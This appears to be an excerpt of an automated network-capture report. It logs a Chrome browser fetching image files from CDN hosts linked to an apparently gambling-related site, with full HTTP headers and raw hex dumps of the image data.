                                                                                                                                                          2024-06-09 22:41:21 UTC5546INData Raw: 35 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5c 5d 8f e4 b8 75 7d cf af a8 ec c2 9e 19 a3 ab a7 a9 ae 8f fe c0 da 6b 27 30 b0 c0 1a 79 58 3f e4 21 40 40 49 54 89 d3 92 a8 a1 a8 aa ae 19 cc 7f 0f 29 f1 aa a8 ea 43 d9 f0 bc 24 08 d6 d3 e4 11 c5 8f c3 cb 7b 2f 8f ea e3 1f fe fd df 56 7f 58 ad fe aa 1a b3 fa f3 49 74 aa 16 ab cd ed fd ed dd 2a 3d af 7e ce f9 51 1c 78 93 9f 57 eb 55 69 4c fb f4 f1 63 61 91 7c 04 de 4a 65 cb 7f 0e 4a 86 b6 7e 95 99 68 3a 11 7b e4 63 e5 eb df bb 97 3e ad 7e fb e5 d7 d5 7f fd f5 d7 15 bb 65 37 ab ff f8 ed b7 a7 d5 df 7e f9 3b 35 f2 c1 b6 f8 71 78 c3 ba e0 99 f8 ea ff 55 cb ea fc f4 ce 3d ef fb fc ee b9 d3 d9 53 af ab f7 ef 6e 6f 3f 8e ff ef b0 dd f0 df b5 7f 7b d8 93 f5 49 a4 ee 4f 71 c7 b7 b7 42 99 3f 1d 7f 1a c6 fd fb ff fd
                                                                                                                                                          Data Ascii: 5ae\]u}k'0yX?!@@IT)C${/VXIt*=~QxWUiLca|JeJ~h:{c>~e7~;5qxU=Sno?{IOqB?


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          608192.168.2.55037843.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC378OUTGET /pc/image-pc/index/121/content_bg.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "61260a03-160c9"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 25 Aug 2021 09:14:43 GMT
                                                                                                                                                          Content-Length: 90313
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 12136199703140006984
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC1138INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 35 20 37 39 2e 31 36 33 34 39 39 2c 20 32 30 31 38 2f 30 38 2f 31 33 2d 31 36 3a 34 30 3a 32 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Ducky</http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:21 UTC4096INData Raw: 42 52 d3 15 f0 e1 62 72 92 33 43 94 55 16 18 f1 82 53 93 b3 24 54 25 36 46 a2 b2 c2 63 34 64 d4 65 75 85 26 66 73 c3 74 b4 35 83 a3 44 a4 45 e2 27 11 01 01 00 02 01 01 05 05 06 04 02 09 04 02 03 01 00 01 11 02 03 21 31 41 51 12 04 61 71 13 14 05 81 a1 d1 22 52 15 f0 91 b1 32 c1 23 42 62 72 82 92 d2 33 53 06 e1 b2 c2 24 f1 a2 e2 43 73 34 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f9 dd 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 32 60 52 b4 10 10 10 10 10 28 82 68 81 44 0a
                                                                                                                                                          Data Ascii: BRbr3CUS$T%6Fc4deu&fst5DE'!1AQaq"R2#Bbr3S$Cs4?2`R(hD
                                                                                                                                                          2024-06-09 22:41:21 UTC4096INData Raw: 5a 0e ea ac b6 ad 35 9d 59 7b e6 87 33 9c 81 57 6b a7 60 ee 14 54 8d 2b 5b c9 42 ef 2b 4d 1c f2 79 89 ee af 15 68 cf 66 37 1d 6c e9 26 11 44 09 05 c4 3a 9c 35 14 aa b5 b8 56 46 57 27 6d 71 0d b4 1e 6d 44 81 81 bc ce 1e fb 97 4a a8 9b 78 2d 74 f1 61 5d 2d 5c 01 1a f1 1e 9e d0 a5 18 5c 64 95 23 b4 1e 23 f6 77 28 4a 98 5a 5a f7 33 b2 b5 d7 dc d1 05 6c 61 86 5a f6 56 94 fc 15 4c 1d 9d 5e a9 a1 01 ad 9d 87 e2 dc 3d b2 3e fd 15 65 5a ce f8 aa 48 3c c8 79 9a 35 66 94 3c 48 3d 85 2d 24 cc 79 2d 2a d9 1f 6e fd 5a ed 1b 5e 3e b5 36 ab 26 19 cc 74 3e c1 69 d7 cb 15 6f 7e 9c 5a 6a b2 db b5 be bd 98 58 bb 6b ad 6f da e0 28 d7 8f 31 94 ee 27 55 1d b9 4f 67 56 d1 8a 94 4c ce 6e e1 47 0e 27 5e 05 63 d8 da 62 c6 b3 bb ac 1a c9 9b 72 c6 90 ef 7b 37 77 ee 4f ad 77 6b 5e 76
                                                                                                                                                          Data Ascii: Z5Y{3Wk`T+[B+Myhf7l&D:5VFW'mqmDJx-ta]-\\d##w(JZZ3laZVL^=>eZH<y5f<H=-$y-*nZ^>6&t>io~ZjXko(1'UOgVLnG'^cbr{7wOwk^v
                                                                                                                                                          2024-06-09 22:41:21 UTC4096INData Raw: 9b 4f 70 b3 76 5c ee 0c 5d ae 4a 3c 74 16 af 80 dd 37 9c 46 5c 27 71 23 b8 1f 2f 5f 42 8c 0f a6 77 56 d4 db 5b 9b 25 8f b1 dc 18 d8 32 76 d1 43 73 34 51 dc 37 9c 36 46 ba 16 d4 7a 9e 54 8f 8f f1 bf 67 6d f9 b8 db 77 93 c2 59 db 3b 1a 6f 2e e0 80 9b 86 47 ff 00 47 b8 7c 24 06 ba 87 42 c5 18 1f 4e 75 6b 63 e7 f7 37 48 24 db 18 b8 98 fc b3 e3 b2 68 8e 47 b5 8c ad bc b1 ba 4f 6c e9 c1 85 28 f8 ef 7c 74 d3 71 6c 4b eb 6b 2c fc 11 c3 73 79 09 9a 11 1c 8d 94 16 07 16 12 79 4f 78 4c 25 f5 df 57 b0 79 7c ef 41 6e f1 58 8b 49 2f b2 37 36 98 df 22 d6 21 cc f7 f9 77 16 f2 3a 83 c1 8c 25 10 b7 d1 dc 0e 5b 01 d0 c6 e2 f2 d6 92 58 df 41 06 40 cb 6d 30 e5 7b 43 e4 95 ed 24 78 83 55 23 89 fd 95 fa 6b b5 b7 64 f9 fb 9d c5 8c 8f 23 6d 67 1d b3 2d c4 dc e1 a2 49 5d 23 9d cb
                                                                                                                                                          Data Ascii: Opv\]J<t7F\'q#/_BwV[%2vCs4Q76FzTgmwY;o.GG|$BNukc7H$hGOl(|tqlKk,syyOxL%Wy|AnXI/76"!w:%[XA@m0{C$xU#kd#mg-I]#
                                                                                                                                                          2024-06-09 22:41:21 UTC384INData Raw: b9 b1 8a ea 9e 0c 75 e7 35 be 45 f0 02 5c d3 cb 23 8f 60 a1 a6 9e 90 b5 f6 b3 bd 2a f6 3a 63 23 66 84 b8 99 61 77 33 46 9a b7 be be 82 b3 da 63 ab 4d 6b 63 db cf e4 f3 20 fe 4d ed 73 e3 77 dd 59 ef d5 a6 bd 18 2d dd 6c f7 5b c5 35 09 2f 12 5b bd c3 80 70 ac 8c 3e a2 0a e9 f4 db 67 a3 8b d5 6b 8b 2b 9e c8 0d 69 da 34 5d 6e 35 08 08 08 08 08 08 08 08 08 08 08 22 88 21 01 04 20 20 84 04 04 04 04 04 15 35 8f 71 a3 5a 49 e3 41 aa 5a 29 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40
                                                                                                                                                          Data Ascii: u5E\#`*:c#faw3FcMkc MswY-l[5/[p>gk+i4]n5"! 5qZIAZ)@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                                                                                                                                                          2024-06-09 22:41:21 UTC4096INData Raw: eb 7d d9 2b 63 da 25 96 dc f2 39 f2 c6 39 5a f6 18 2a f8 c8 93 57 06 a0 f8 e7 ac 30 74 da db 75 5b 41 d3 d9 9b 3e 14 d8 46 fb 87 b2 49 65 1f 2a 32 ca 1e 39 a6 25 c3 e2 c4 7e 0a 32 3e b9 df 1b 2e ef 7a f4 85 db 66 ce e2 3b 5b 8b fb 5b 0e 49 e5 0e 2c 6f 93 2c 33 9a 86 d4 ea 22 a2 51 e7 da db 5b ea ef a3 77 38 8c c5 f4 32 0c 75 ad f4 b7 37 8d 0e 64 40 4a 64 90 7b ed 7f 2e 8a 47 29 e9 d6 17 ae 5d 44 e9 bc 33 43 bf 23 c7 e1 e7 64 96 1f 22 16 30 36 41 14 3f 15 ca 27 89 8c 93 de f7 3a aa 12 eb bd 2a d9 2d e9 86 c0 97 19 94 c8 c3 3c 36 92 cf 7b 3d e0 06 28 db 19 00 9a f3 9e c0 ce f5 28 7c 6d d3 9e 99 6e cd f4 db b8 f6 f4 11 cc eb 06 c6 eb 9f 36 56 c5 41 29 77 2d 39 b8 fb c2 a2 25 f5 86 f9 e9 e6 e6 cc 74 0a c7 65 d9 43 1b b3 b0 58 e2 ed e4 89 d2 35 ac f3 2c fc 9f
                                                                                                                                                          Data Ascii: }+c%99Z*W0tu[A>FIe*29%~2>.zf;[[I,o,3"Q[w82u7d@Jd{.G)]D3C#d"06A?':*-<6{=((|mn6VA)w-9%teCX5,
                                                                                                                                                          2024-06-09 22:41:21 UTC1536INData Raw: d1 1e 97 c9 a1 c1 44 0f 67 2b 9e 3c 7b 0a 9f 2c 3e 26 de c7 cd 9d 6d c7 ed 0c 56 f2 7e 1f 6c d9 8b 58 31 f1 88 ee dc 1e 5f cf 39 15 75 2a 4f bd e0 a3 59 fc 9b 4b d2 67 b5 cf cd 2a ac 91 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 a8 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 14 41 28 26 88 08 26 88 25 01 01 01 01 01 01 01 01 02 88 24 51 01 01 01 03 54 12 81 44 13 44 13 44 12 02 09 a2 09 01 02 88 26 88 26 88 14 41 34 40 a2 09 a2 05 02 05 10 4a
                                                                                                                                                          Data Ascii: Dg+<{,>&mV~lX1_9u*OYKg*A(&&%$QTDDD&&A4@J
                                                                                                                                                          2024-06-09 22:41:21 UTC2816INData Raw: 28 70 ab 4f 6a e6 db ea 3c 3a dc 79 ba cb e1 7f 05 e7 0e d7 ed 6c 5b 3f ec eb bd ae f7 1d a5 be e7 c6 cd 61 82 7f 99 f2 cb bb 7b 9b 47 4a ca 46 e2 ce 50 1d 35 6b 2f 28 f7 85 61 cd f5 3d 3c 97 e1 d9 76 f6 cd 93 af 0d cf e6 ec 6f bb 87 ec b7 b5 ed f0 77 d3 61 2e 72 57 79 78 e0 91 d6 16 d2 cd 6a 19 24 e1 bf 16 d7 13 0c 74 05 df ba 0b 97 5f a9 f2 e6 79 bc b8 cc cf 4b f8 af 78 75 ee ce 5c a0 74 03 ab 9a 7f a8 0d 7f fa ab 3f d3 2e ff 00 dc b8 3f 55 fe 5b 7e 0c fe 0e de 0c 0e ec e9 de f1 da 51 5b cb b8 71 ff 00 21 8e e9 ce 65 bb bc e8 65 e6 2d 00 bb 48 9e fa 52 ab 7e 1f 57 c7 cb 6c d2 e6 fb aa bb 71 d9 d6 b6 8e 8a 74 bb 0f bf ae b2 b0 e4 ae ee 2d 46 3d 90 be 33 6c 59 ed 79 a6 40 43 b9 da ff 00 cc 5c de bf d5 ef c5 e5 9a c9 d7 c5 7e 2d 25 cd ae af fd 94 76 6f f4
                                                                                                                                                          Data Ascii: (pOj<:yl[?a{GJFP5k/(a=<vowa.rWyxj$t_yKxu\t?.?U[~Q[q!ee-HR~Wlqt-F=3lYy@C\~-%vo
                                                                                                                                                          2024-06-09 22:41:21 UTC2816INData Raw: db 59 31 55 db 6d 75 e9 7b 55 63 7a eb 80 ca 5a b6 ef 19 84 cf 5f 5a 38 96 b6 e2 db 1b 34 d1 92 0e a0 3d 9c c0 aa ef c1 be b7 1b 5d 25 ff 00 6a 26 59 7a cc d8 e4 1f 68 ce a0 63 b7 1b 70 b8 e8 ac 72 18 fb cb 57 c9 71 24 39 1b 59 2d 5c 62 91 a1 8d 73 5a fa 12 39 98 57 a3 f4 be 1d a6 d7 6b 8c 59 8e 97 2c b9 af 4c 75 cb 5d e8 be 47 a8 70 e6 6f ec 36 41 b3 6d f5 d5 bb 66 b9 f9 6f bd f2 e0 78 6d 1b af 1a ce ba 3e a5 af 16 35 db 93 38 cf 77 b7 ff 00 c2 bc 16 f7 61 d3 b3 f9 ff 00 b4 b6 0b 0d 77 97 be 76 1f e4 96 51 99 67 f2 db cc f0 d6 f1 a0 3c 57 97 c7 af a6 db 69 ae 77 96 d6 d7 cf 26 7a 39 d8 fb 4b f5 67 fc 25 8f f3 7f ff 00 dd 7a 3f b4 f1 f8 ec c7 e3 df 07 d2 bd 33 dc 79 2d c1 b1 b1 39 8c 9b 98 eb eb c8 4b e7 31 b7 95 b5 e7 73 74 6f a9 78 dc da cd 39 36 d6 76
                                                                                                                                                          Data Ascii: Y1Umu{UczZ_Z84=]%j&YzhcprWq$9Y-\bsZ9WkY,Lu]Gpo6Amfoxm>58wawvQg<Wiw&z9Kg%z?3y-9K1stox96v
                                                                                                                                                          2024-06-09 22:41:21 UTC4096INData Raw: 58 dc 44 80 7e 36 1f fe de 25 f5 3f 4b ff 00 a1 af db fd 6b 87 9f fb eb 4b f2 99 f9 a3 dc 5d f8 62 79 4c fc d1 ee 26 07 b3 13 60 db ec a5 9d 87 98 21 17 53 c5 01 99 c0 96 b3 cd 78 67 31 1e 15 55 e5 df c9 ad db 1d 91 3a cc df b5 f4 de d3 d8 bd 56 d9 f8 47 63 71 39 fc 75 c5 8c 45 f2 c1 6d 73 6b 24 85 85 d5 7b 9a c7 36 48 fd f3 8f 6f 69 5f 2b ea 3d 57 17 2e de 7b ae d2 df 0b ff 00 a3 bf 4e 3d a7 49 65 72 6b 8f b4 af 52 ef 2d 25 b7 92 0c 77 93 3b 1d 1b e9 0c b5 a3 c1 07 5f 3b 4e 2b d6 9f 48 e3 e9 f9 b6 fe 3e c6 1f 33 7c 23 d7 f6 73 d8 9f ad f7 20 ce de 47 5b 1c 21 0e 8c 11 a3 ee 9d ef 29 5f f0 7e ff 00 d3 ca a3 ea de a7 cb a4 e3 9d bb 7f 43 83 4c db b7 73 bf 75 33 7d 41 b3 76 7d ee 61 d4 75 c8 6f 95 61 13 b8 3e e2 4a 88 c5 34 a8 14 e6 77 ee 41 5e 37 07 0d e5
                                                                                                                                                          Data Ascii: XD~6%?KkK]byL&`!Sxg1U:VGcq9uEmsk${6Hoi_+=W.{N=IerkR-%w;_;N+H>3|#s G[!)_~CLsu3}Av}auoa>J4wA^7


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          609192.168.2.55039190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC612OUTGET /pc/image-pc/index/312/nav/casino/slot_bg.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 41871
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Mon, 10 Feb 2020 11:21:24 GMT
                                                                                                                                                          ETag: "5e413cb4-a38f"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE1[3],EU-FRA-paris-GLOBAL1-CACHE9[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 68847c09a7e22a1ea83feda098474ad9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126899
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC15769INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRQjtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                          2024-06-09 22:41:21 UTC16384INData Raw: 91 3e fa 68 1b ab c5 f5 cc 9d bf 60 5f 45 45 65 7b 47 57 a7 83 80 eb 6a 69 6a 44 29 89 ea de ae 4e 62 af 10 2c 52 0c d3 27 e5 22 ab b0 18 0f 3f f4 10 7e f7 97 c7 90 65 35 62 c9 fc 39 e0 58 b5 13 9d ab 96 36 36 bd 35 41 e1 9b 5d 5b 9c 18 20 16 8d a8 8c c2 c0 c2 08 39 42 3a a6 b9 a5 0d 4e bb 05 4b 8f 98 87 64 94 e9 19 59 95 91 7e 72 7f 6c c6 41 d6 f1 17 60 34 bb 02 cf de 77 0f fe fa c8 23 c8 29 c8 c7 05 17 5d 08 07 09 62 c6 3c b6 ac 3c 74 90 dd ef d8 f1 11 86 da db 61 b4 9a 50 59 3d 43 ed 20 fd 9d 1d e5 fe 40 60 c8 41 4c f9 0f a6 8e 7c c0 6e e5 63 8f 3d 87 e6 fd 1d a1 b6 7d 3d be be 9d b5 49 68 25 ac ba e0 4c 53 6e 7e 0e d7 dd dc 2a a5 ec bf 34 51 22 a0 2e ad c2 51 d8 ec 1a 55 b2 66 cc 99 6a aa ac e9 10 59 bd 82 20 ea 33 b8 84 c7 9b 5a 93 3e 95 fe 4d 2a a9
                                                                                                                                                          Data Ascii: >h`_EEe{GWjijD)Nb,R'"?~e5b9X665A][ 9B:NKdY~rlA`4w#)]b<<taPY=C @`AL|nc=}=Ih%LSn~*4Q".QUfjY 3Z>M*
                                                                                                                                                          2024-06-09 22:41:21 UTC9718INData Raw: df 44 32 43 35 77 a9 25 37 68 64 4f 6f a1 74 e4 d2 03 7f bf 07 8f 16 8d c2 4b 1c e5 71 19 75 95 46 de 48 54 69 e5 d0 de 3f 9d 0b 5b 37 3e 30 23 71 ed 5b d1 ac 9b d7 44 4e 5b 70 d1 b5 da a3 f4 f1 92 84 2e 29 e5 2d dc 07 0f 35 8c 51 ab 04 e3 30 02 4f 1f 3e c3 78 d2 c3 b8 21 54 ad 46 05 c8 d4 8a aa b5 da b9 f6 24 4c 99 64 f2 2b 10 b3 10 05 2a 15 41 e7 a1 8a 1e a1 47 25 cd 42 81 ae 18 5e 4e 10 b1 80 41 87 6e 73 4e 21 b8 83 31 d8 bc 69 2b 04 11 94 b6 77 b6 a2 b7 84 ee 37 b1 64 d3 14 56 8b 1e 72 b3 32 a0 b0 a8 94 29 d4 89 b3 df 89 af a5 fe 23 93 49 c7 d4 1f 0e 3c d1 94 62 a0 98 88 d9 84 2e 3d d1 c4 73 b1 8b 12 65 42 60 ac d3 80 ee 2b 45 7e 4d 66 43 2a 73 8d 9b 1c c4 cd a5 52 09 f4 02 41 8a 86 a0 a9 a9 05 0e 37 36 a3 d9 13 20 3f 9f ba 27 b3 c1 e9 75 a3 c0 76 42
                                                                                                                                                          Data Ascii: D2C5w%7hdOotKquFHTi?[7>0#q[DN[p.)-5Q0O>x!TF$Ld+*AG%B^NAnsN!1i+w7dVr2)#I<b.=seB`+E~MfC*sRA76 ?'uvB


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          610192.168.2.55039490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC608OUTGET /pc/image-pc/index/312/nav/lottery/01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC618INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 68837
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:49 GMT
                                                                                                                                                          ETag: "5d71fe81-10ce5"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[4],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE26[9],EU-FRA-paris-GLOBAL1-CACHE23[0,TCP_HIT,7],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b74f788bb34a99859db9a8fd6fd8fb3e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126899
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC15766INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b0 00 00 00 b7 08 06 00 00 00 b2 b2 d4 e6 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da dc fd 67 b4 2d 49 76 1e 06 7e 7b 47 44 ba 63 af 37 cf db 32 af 7c 75 55 7b 0f d3 30 24 41 40 03 d0 2d d0 cf 00 9c 59 8b 33 1a 92 22 35 00 d1 92 40 cd 12 47 14 67 89 4b e4 10 a4 44 10 1a 36 45 02 20 d8 68 10 a6 0d ba ba 0b 5d d5 e5 bd 7d f5 fc 7b d7 df 7b 7c ba 30 7b 7e 9c 7b 5f bd aa ae ee 06 3d 47 b1 56 de 73 4e 9e cc 3c 79 23 be dc b1 e3 db 8e 44 44 e1 3f 62 0b df e5 7b fe b7 38 9f 05 80 db ff a0
                                                                                                                                                          Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDCIDATxg-Iv~{GDc72|uU{0$A@-Y3"5@GgKD6E h]}{{|0{~{_=GVsN<y#DD?b{8
